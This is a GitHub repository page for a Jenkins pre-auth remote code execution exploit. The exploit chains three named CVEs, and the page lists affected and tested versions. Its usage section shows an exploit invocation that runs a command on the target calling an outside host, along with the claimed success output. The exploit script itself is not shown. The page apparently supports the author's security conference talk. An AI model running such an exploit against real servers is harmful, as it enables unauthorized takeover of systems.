Skip to content

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

Notifications You must be signed in to change notification settings

orangetw/awesome-jenkins-rce-2019

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

awesome-jenkins-rce-2019

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Affect list

  • ANONYMOUS_READ disable

    • Jenkins version < 2.138
  • ANONYMOUS_READ enable(or with a normal user account)

    • Jenkins build time < 2019-01-28

Usage

$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Acknowledgements

Part slides from my HITB AMS 2019 talk:

1.png 2.png 3.png

References

About

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages